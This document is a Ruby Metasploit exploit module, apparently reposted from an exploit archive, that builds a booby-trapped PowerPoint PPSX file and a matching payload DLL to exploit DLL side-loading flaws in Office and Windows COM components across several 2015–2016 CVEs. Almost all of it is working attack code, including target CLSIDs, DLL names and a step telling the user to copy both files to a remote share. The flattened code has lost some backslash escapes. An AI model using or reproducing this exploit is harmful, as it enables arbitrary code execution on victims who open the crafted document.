Office OLE DLL Hijacking
Posted on 11 November 2016
require 'zip' require 'base64' require 'msf/core' require 'rex/ole' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Office OLE Multiple DLL Side Loading Vulnerabilities', 'Description' => %q{ Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker's DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system. }, 'Author' => 'Yorick Koster', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-6132'], ['CVE', '2015-6128'], ['CVE', '2015-6133'], ['CVE', '2016-0041'], ['CVE', '2016-0100'], ['CVE', '2016-3235'], ['MSB', 'MS15-132'], ['MSB', 'MS16-014'], ['MSB', 'MS16-025'], ['MSB', 'MS16-041'], ['MSB', 'MS16-070'], ['URL', 'https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html'], ['URL', 'https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html'], ['URL', 'https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/exec', 'CMD' => 'C:\Windows\System32\calc.exe', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Targets' => [ [ 'All', {} ], [ 'COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)', { 'DLL' => 'mqrt.dll', # {ecabafc9-7f19-11d2-978e-0000f8757e2a} 'CLSID' => "xC9xAFxABxECx19x7FxD2x11x97x8Ex00x00xF8x75x7Ex2A" } ], [ 'Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)', { 'DLL' => 'spframe.dll', # {D27CDB6E-AE6D-11cf-96B8-444553540000} 'CLSID' => "x6ExDBx7CxD2x6DxAExCFx11x96xB8x44x45x53x54x00x00" } ], [ 'Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)', { 'DLL' => 'wuaext.dll', # {D93CE8B5-3BF8-462C-A03F-DED2730078BA} 'CLSID' => "xB5xE8x3CxD9xF8x3Bx2Cx46xA0x3FxDExD2x73x00x78xBA" } ], [ 'Shutdown UX / Windows 10 / Office 2016 (MS15-132)', { 'DLL' => 'wuaext.dll', # {14ce31dc-abc2-484c-b061-cf3416aed8ff} 'CLSID' => "xDCx31xCEx14xC2xABx4Cx48xB0x61xCFx34x16xAExD8xFF" } ], [ 'MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)', { 'DLL' => 'phoneinfo.dll', # {B9033E87-33CF-4D77-BC9B-895AFBBA72E4} 'CLSID' => "x87x3Ex03xB9xCFx33x77x4DxBCx9Bx89x5AxFBxBAx72xE4" } ], [ 'Microsoft Visio 2010 / Windows 7 (MS16-070)', { 'DLL' => 'msoutls.dll', # 6C92B806-B900-4392-89F7-2ED4B4C23211} 'CLSID' => "x06xB8x92x6Cx00xB9x92x43x89xF7x2ExD4xB4xC2x32x11" } ], [ 'Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)', { 'DLL' => 'elsext.dll', # {394C052E-B830-11D0-9A86-00C04FD8DBF7} 'CLSID' => "x2Ex05x4Cx39x30xB8xD0x11x9Ax86x00xC0x4FxD8xDBxF7" } ], [ 'OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)', { 'DLL' => 'oci.dll', # {e8cc4cbf-fdff-11d0-b865-00a0c9081c1d} 'CLSID' => "xBFx4CxCCxE8xFFxFDxD0x11xB8x65x00xA0xC9x08x1Cx1D" } ], [ 'Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)', { 'DLL' => 'wab32res.dll', # {32714800-2E5F-11d0-8B85-00AA0044F941} 'CLSID' => "x00x48x71x32x5Fx2ExD0x11x8Bx85x00xAAx00x44xF9x41" } ], [ 'NPS Datastore server / Windows Vista / Office 2010 (MS16-014)', { 'DLL' => 'iasdatastore2.dll', # {48da6741-1bf0-4a44-8325-293086c79077} 'CLSID' => "x41x67xDAx48xF0x1Bx44x4Ax83x25x29x30x86xC7x90x77" } ], [ 'BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)', { 'DLL' => 'ehTrace.dll', # {FC772AB0-0C7F-11D3-8FF2-00A0C9224CF4} 'CLSID' => "xB0x2Ax77xFCx7Fx0CxD3x11x8FxF2x00xA0xC9x22x4CxF4" } ], ], 'Privileged' => false, 'DisclosureDate' => 'Dec 8 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']), ], self.class) end def exploit if target.name == 'All' targets = @targets else targets = [ target ] end @arch.each do |a| exploit_regenerate_payload('win', a, nil) targets.each do |t| if t.name == 'All' next end print_status("Using target #{t.name}") dll_name = t['DLL'] if target.name == 'All' ppsx_name = t.name.split(///).first + ".ppsx" else ppsx_name = datastore['FILENAME'] end print_status("Creating the payload DLL (#{a})...") opts = {} opts[:arch] = [ a ] dll = generate_payload_dll(opts) dll_path = store_file(dll, a, dll_name) print_good("#{dll_name} stored at #{dll_path}, copy it to a remote share") print_status("Creating the PPSX file...") ppsx = get_ppsx(t['CLSID']) ppsx_path = store_file(ppsx, a, ppsx_name) print_good("#{ppsx_name} stored at #{ppsx_path}, copy it to a remote share") end end end def store_file(data, subdir, filename) ltype = "exploit.fileformat.#{self.shortname}" if ! ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end subdir.gsub!(/[^a-z0-9.\_-]+/i, '') if ! ::File.directory?(Msf::Config.local_directory + "/" + subdir) FileUtils.mkdir_p(Msf::Config.local_directory + "/" + subdir) end if filename and not filename.empty? if filename =~ /(.*).(.*)/ ext = $2 fname = $1 else fname = filename end else fname = "local_#{Time.now.utc.to_i}" end fname = ::File.split(fname).last fname.gsub!(/[^a-z0-9.\_-]+/i, '') fname << ".#{ext}" path = File.join(Msf::Config.local_directory + "/" + subdir, fname) full_path = ::File.expand_path(path) File.open(full_path, "wb") { |fd| fd.write(data) } report_note(:data => full_path.dup, :type => "#{ltype}.localpath") full_path.dup end def create_ole(clsid) ole_tmp = Rex::Quickfile.new('ole') stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) stm = stg.create_stream("x01OLE10Native") stm.close directory = stg.instance_variable_get(:@directory) directory.each_entry do |entry| if entry.instance_variable_get(:@_ab) == 'Root Entry' clsid = Rex::OLE::CLSID.new(clsid) entry.instance_variable_set(:@_clsId, clsid) end end # write to disk stg.close ole_contents = File.read(ole_tmp.path) ole_tmp.close ole_tmp.unlink ole_contents end def get_ppsx(clsid) path = ::File.join(Msf::Config.data_directory, 'exploits', 'office_ole_multiple_dll_hijack.ppsx') fd = ::File.open(path, "rb") data = fd.read(fd.stat.size) fd.close ppsx = Rex::Zip::Archive.new Zip::InputStream.open(StringIO.new(data)) do |zis| while entry = zis.get_next_entry ppsx.add_file(entry.name, zis.read) end end ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid)) ppsx.pack end end